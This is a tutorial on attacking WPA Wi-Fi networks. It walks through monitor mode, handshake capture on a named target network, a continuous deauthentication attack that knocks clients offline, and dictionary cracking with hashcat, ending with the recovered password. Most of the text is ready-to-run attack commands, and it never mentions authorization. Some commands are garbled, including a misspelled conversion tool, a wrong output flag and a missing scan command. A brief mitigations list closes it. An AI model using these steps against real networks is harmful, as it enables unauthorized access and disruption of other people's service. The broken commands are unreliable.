Wi-Fi Hacking : Deauthentication Attack and Password Cracking.
STEP 1 : Go To Devices and add External wifi adaptor in your kali machine.
I will be using the TP-Link AC600 adapter.
Check wifi adapter attached or not in your system using following command.
lsusb
STEP 2 : Installation we have use the aircrack-ng tool for perform this attack.
Using the following commands download aircrack-ng.
sudo apt install aircrack-ng
STEP 3 : Check the Available network interfaces with some basic information.
Using Following command :
iwconfig
STEP 4 : The adapter is in Managed Mode, to monitor and inject deauth packets we have to put the adapter in monitor mode using the following command.
airmon-ng start wlan0
airmon-ng’ : it is the script that is used to enable/disable monitor mode for network adapters.
‘start’ : the argument instructs airmon-ng to start monitor mode.
‘wlan0’ : it is the default name of the network adapter to be used for the attack.
Now we have to start monitoring nearby wifi.
STEP 5 : we can monitor all available networks using following command.
As we can see all nearby networks are listed with their BSSID (MAC), Channel they are operating on (CH), Encryption Type (ENC) etc.
Our target is the 1 Saidham-2–5G.
STEP 6 : So after setting the target and copying the BSSID.
we will specifically only monitor that network while also constantly trying to intercept Handshake Address if any using the following command.
airodump-ng --bssid <<BSSID>> -c <<Channel_number>> -w psk <<wlan>>
The monitoring and checking for handshakes has been started on the target and now we will deauthenticate all the client devices from the router, so they automatically try to reconnect, and airodump-ng captures the handshake address.
STEP 7 : Deauthenticate using aireplay-ng.
using following command :
-0is the option for a "Deauthentication Attack."0This specifies the type of attack and the number of attacks to perform.aireplay-ng -0 0 -a <<BSSID>> <<wlan>>sends continuous deauthentication packets.
aireplay-ng -0 0 -a <<BSSID>> <<wlan>>
As the attack starts, it disassociates all the clients connected to the network and as a result the devices will automatically try to reconnect to the network and this attempt to reconnect with the handshake address will be captured by the ‘airodump-ng’ script running.
As it can be seen at the top right of the screen, airodump-ng fetched the WPA Handshake for the Access Point with that specific BSSID.
We can see all captured Handshake files using ls command in current directory.
We can see the file information using following command.
aircrack-ng <<File_Name.cap>>
STEP 8 : Using hcxpcangtool convert .cap file to hash format.
hcxpcangtool: Converts capture files to Hashcat-compatible formats.<<file_name>>: Input capture file (e.g., .cap or .hccapx).-0 pass.hc22000: Outputs converted data in Hashcat's.hc22000format.-E essod.wordlist: Uses a wordlist for ESSIDs.
hcxpcangtool <<file_name>> -0 pass.hc22000 -E essod.wordlist
STEP 9 : Using the hashcat tool, I attempted to crack the hash and was successful in obtaining the password.
We will use rockyou.txt as a dictonary for attack.
hashcat: The tool for password cracking.-m 22000: Specifies the hash mode for WPA/WPA2 (Hashcat's mode number for.hc22000files).pass.hc22000: The input file containing the WPA/WPA2 hash data./usr/share/wordlists/rockyou.txt: The wordlist file used for the password cracking attempt.
hashcat -m 22000 pass.hc22000 /usr/share/wordlists/rockyou.txt
We have cracked the hash and obtained the password.
The password is: 0987654321
MITIGATIONS :
Use a strong and unique Wi-Fi password: Avoid using easily guessable passwords like “0987654321”. Use a strong and unique password that is hard to crack.
Use WPA2-PSK (AES) encryption: Make sure your router is using WPA2-PSK (AES) encryption, which is the most secure encryption protocol available for Wi-Fi networks.
Regularly update your router’s firmware: Keep your router’s firmware up to date to ensure you have the latest security patches and features.
Use a firewall: Enable the firewall on your router and devices to block unauthorized access to your network.
Use MAC address filtering: Enable MAC address filtering on your router to only allow specific devices to connect to your network.
Use a VPN: Use a Virtual Private Network (VPN) to encrypt your internet traffic, even when connected to a public Wi-Fi network.
Monitor your network activity: Regularly monitor your network activity to detect and respond to suspicious behavior.
Use a secure Wi-Fi adapter: Use a secure Wi-Fi adapter that has built-in security features, such as encryption and secure boot.
Disable WPS: Disable Wi-Fi Protected Setup (WPS) on your router, as it can be vulnerable to attacks.
Perform regular security audits: Perform regular security audits to identify and address vulnerabilities in your network.
Conclusion:
In summary, we successfully performed the attack, captured the handshake, and cracked the Wi-Fi password, revealing it as “0987654321.”
